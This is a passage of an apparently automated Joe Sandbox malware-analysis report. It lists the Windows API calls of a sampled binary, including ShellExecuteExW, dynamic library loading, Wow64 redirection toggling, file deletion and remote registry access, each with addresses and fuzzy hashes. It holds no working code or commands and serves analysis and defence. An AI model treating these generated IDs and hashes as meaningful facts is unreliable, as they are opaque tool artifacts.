                                                                                                                                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 146765662-0
                                                                                                                                                                                          • Opcode ID: 74698401c4d19fc816728bc119abd2216c6118c55cbab41860199932f99228b5
                                                                                                                                                                                          • Instruction ID: d7d7759c1356651994ba3437b413553d45f2862f36d08b541276c4948f9c171b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 74698401c4d19fc816728bc119abd2216c6118c55cbab41860199932f99228b5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BE0C976004509BBD7111BE1EC0CD05BF29FB493217168238F22582070CB3A5821DB54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 007341EA: _wcslen.LIBCMT ref: 007341EF
                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0079CF99
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0079CFE0
                                                                                                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0079D047
                                                                                                                                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0079D075
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                          • API String ID: 1227352736-4108050209
                                                                                                                                                                                          • Opcode ID: 097f6d4eeae75787bfa25058633af718e6119db51948a77f561435c7a3e7949e
                                                                                                                                                                                          • Instruction ID: ef15509ad1c791fc38027dd99d63cbe792e04315740a4de06574eaa7bcd7c9c8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 097f6d4eeae75787bfa25058633af718e6119db51948a77f561435c7a3e7949e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5251EE326043009BEF25EE28E849BAFBBE9EF45314F040A2DF991D3191DBB8CD058752
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 007BB903
                                                                                                                                                                                            • Part of subcall function 007341EA: _wcslen.LIBCMT ref: 007341EF
                                                                                                                                                                                          • GetProcessId.KERNEL32(00000000), ref: 007BB998
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 007BB9C7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                          • String ID: <$@
                                                                                                                                                                                          • API String ID: 146682121-1426351568
                                                                                                                                                                                          • Opcode ID: 0bf2035923479a0b53eb28361c2e0a8ca518e09ec143e97d265a8fd400f89c77
                                                                                                                                                                                          • Instruction ID: 7491ffae3d8a12af822b81a9b8a8e4ba7046b295ca2ae50c3d5711545be04a35
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bf2035923479a0b53eb28361c2e0a8ca518e09ec143e97d265a8fd400f89c77
                                                                                                                                                                                          • Instruction Fuzzy Hash: 12719A74A00619DFDB14EF64C488A9EBBF4FF08300F048499E856AB352CBB8ED45CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00797B6D
                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00797BA3
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00797BB4
                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00797C36
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                          • String ID: DllGetClassObject
                                                                                                                                                                                          • API String ID: 753597075-1075368562
                                                                                                                                                                                          • Opcode ID: 193d00939ebdc21e65e3ba4574b520877b20b0cbd8bc9ea9fd2b987f3dc2b54d
                                                                                                                                                                                          • Instruction ID: 31a699789ff37381b285c96e1588db4e6dfecfdb56f15aa9783f316de0e0ae52
                                                                                                                                                                                          • Opcode Fuzzy Hash: 193d00939ebdc21e65e3ba4574b520877b20b0cbd8bc9ea9fd2b987f3dc2b54d
                                                                                                                                                                                          • Instruction Fuzzy Hash: C641C0B1614204EFDF19CF24E884A9A7BBDEF45310F1480ADE9099F245D7B8ED40CBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007C48D1
                                                                                                                                                                                          • IsMenu.USER32(?), ref: 007C48E6
                                                                                                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007C492E
                                                                                                                                                                                          • DrawMenuBar.USER32 ref: 007C4941
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                          • API String ID: 3076010158-4108050209
                                                                                                                                                                                          • Opcode ID: 2298d1e7aa16a089def2d32890f82b9121c1c5ee8710144fbd61ce73d55c2d23
                                                                                                                                                                                          • Instruction ID: 78abe051d48ac8253bc23b01e8ea72b080026e9334b33dc159fc09137cf27218
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2298d1e7aa16a089def2d32890f82b9121c1c5ee8710144fbd61ce73d55c2d23
                                                                                                                                                                                          • Instruction Fuzzy Hash: 56415975A00219EFDB10CF55D894EAABBB9FF06324F04812DF955A7250C738ED55CB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                            • Part of subcall function 007945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00794620
                                                                                                                                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007927B3
                                                                                                                                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007927C6
                                                                                                                                                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 007927F6
                                                                                                                                                                                            • Part of subcall function 00738577: _wcslen.LIBCMT ref: 0073858A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                          • API String ID: 2081771294-1403004172
                                                                                                                                                                                          • Opcode ID: 4804cb7dad4a603891a43799e51c3e313f9a6a491e0f133d8da741b2cf62b117
                                                                                                                                                                                          • Instruction ID: 5ee59cc017d5075fe98b562cfded1146d1cfe882784ceaeec32ab721a560f5e9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4804cb7dad4a603891a43799e51c3e313f9a6a491e0f133d8da741b2cf62b117
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D21E771A00108BEDF15ABA4EC4ADFEB7B8DF453A0F104129F511A71E2CB7C4D0A9A60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007C3A29
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 007C3A30
                                                                                                                                                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007C3A45
                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 007C3A4D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                          • String ID: SysAnimate32
                                                                                                                                                                                          • API String ID: 3529120543-1011021900
                                                                                                                                                                                          • Opcode ID: b50cccd5e53f10884e95961e572c735215018112312bc1d294b1cea1e6081c68
                                                                                                                                                                                          • Instruction ID: 91b15f9cc319cbe1d03114f86464b86ef66572e39c7c984677a0482b76f993a3
                                                                                                                                                                                          • Opcode Fuzzy Hash: b50cccd5e53f10884e95961e572c735215018112312bc1d294b1cea1e6081c68
                                                                                                                                                                                          • Instruction Fuzzy Hash: F721D171200A09AFEF109F64DC84FBF77A9EB45368F10D22DFA9192190C379DD509760
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0075508E,?,?,0075502E,?,007F98D8,0000000C,00755185,?,00000002), ref: 007550FD
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00755110
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,0075508E,?,?,0075502E,?,007F98D8,0000000C,00755185,?,00000002,00000000), ref: 00755133
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                          • Opcode ID: 2a74d6210b1c85aae7ff60fc440c354ac7e77aa3f210fd1a235373f2131bfbc6
                                                                                                                                                                                          • Instruction ID: c132f15a7177ea5ae9f10a398b5563c169a23feacc4765162885cdb0f03a6228
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a74d6210b1c85aae7ff60fc440c354ac7e77aa3f210fd1a235373f2131bfbc6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CF03C30A0060CBBDB219F95DC59BEDBFB6EF04762F454069A809A2260DB799E44CA94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32 ref: 0078E785
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0078E797
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0078E7BD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                          • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                          • API String ID: 145871493-2590602151
                                                                                                                                                                                          • Opcode ID: 59e6a18dfcba3e4b3f36fc4203fceba7c0df53c68f5c43581c0ef5f58f1cdff7
                                                                                                                                                                                          • Instruction ID: c4ce6d19ea42560ddc5b6062453c294c214cfff308d83a4c0f908e0ae8dc1fc2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 59e6a18dfcba3e4b3f36fc4203fceba7c0df53c68f5c43581c0ef5f58f1cdff7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FE02270A82624DFD7B17B204C88E6A7329AF20B01B1642ACF902E2160EB3CCC448798
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0073668B,?,?,007362FA,?,00000001,?,?,00000000), ref: 0073664A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0073665C
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,0073668B,?,?,007362FA,?,00000001,?,?,00000000), ref: 0073666E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                          • API String ID: 145871493-3689287502
                                                                                                                                                                                          • Opcode ID: bc39362dcab66ad12195e5f7d1a93d037575f2ff825e15845c763ba72e946833
                                                                                                                                                                                          • Instruction ID: 0c4608937dc4680914f4154b8b0f57ff3167beffa196be734c51a475574e73ab
                                                                                                                                                                                          • Opcode Fuzzy Hash: bc39362dcab66ad12195e5f7d1a93d037575f2ff825e15845c763ba72e946833
                                                                                                                                                                                          • Instruction Fuzzy Hash: 63E086356015226BA2312725AC09F6AA7299F82B52F0A812DF904D2240DB5CCC0180B8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00775657,?,?,007362FA,?,00000001,?,?,00000000), ref: 00736610
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00736622
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00775657,?,?,007362FA,?,00000001,?,?,00000000), ref: 00736635
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                          • API String ID: 145871493-1355242751
                                                                                                                                                                                          • Opcode ID: ec64a4956fc33f9090a5afb6d40b5337b734ec765fbd7879861394294e269a63
                                                                                                                                                                                          • Instruction ID: 04a07c15ddaa70afa0378499aad0ff95d54d7a4405cf7c2dbae3733cdb43f7db
                                                                                                                                                                                          • Opcode Fuzzy Hash: ec64a4956fc33f9090a5afb6d40b5337b734ec765fbd7879861394294e269a63
                                                                                                                                                                                          • Instruction Fuzzy Hash: 29D05B35612935FB523227257C19E9F6B269ED1F5131A843DF904A2124CF6DCD01C5EC
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007A35C4
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 007A3646
                                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007A365C
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007A366D
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007A367F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Delete$Copy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3226157194-0
                                                                                                                                                                                          • Opcode ID: 15fd54a449c1f095e19f501e20fcb961e33fb394bb33286e9fd96f484290b37b
                                                                                                                                                                                          • Instruction ID: 6390545dc239f96de0ae29713ed2147b3e69951a6c299525b6f25e1b5ebeafca
                                                                                                                                                                                          • Opcode Fuzzy Hash: 15fd54a449c1f095e19f501e20fcb961e33fb394bb33286e9fd96f484290b37b
                                                                                                                                                                                          • Instruction Fuzzy Hash: F8B15C72D00119EBDF25DFA4CC89EDEBBBDEF49300F0041A6F509A6142EA789B458B61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 007BAE87
                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007BAE95
                                                                                                                                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 007BAEC8
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 007BB09D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3488606520-0
                                                                                                                                                                                          • Opcode ID: 0d57f51c10b720cc2b897223904aa1df1f3c353b0e9dc50ce67bc1ca3a6b9199
                                                                                                                                                                                          • Instruction ID: 709e9d51241ddd27fb85463736cc3b938e060b63496d6ec834b4294f23c13aac
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d57f51c10b720cc2b897223904aa1df1f3c353b0e9dc50ce67bc1ca3a6b9199
                                                                                                                                                                                          • Instruction Fuzzy Hash: DFA1A1B1604301EFE720EF24C88AF2AB7E5AF44710F54885DF9999B2D2D7B5EC408B91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                            • Part of subcall function 007BD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007BC10E,?,?), ref: 007BD415
                                                                                                                                                                                            • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD451
                                                                                                                                                                                            • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD4C8
                                                                                                                                                                                            • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD4FE
                                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007BC505
                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007BC560
                                                                                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007BC5C3
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?), ref: 007BC606
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 007BC613
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
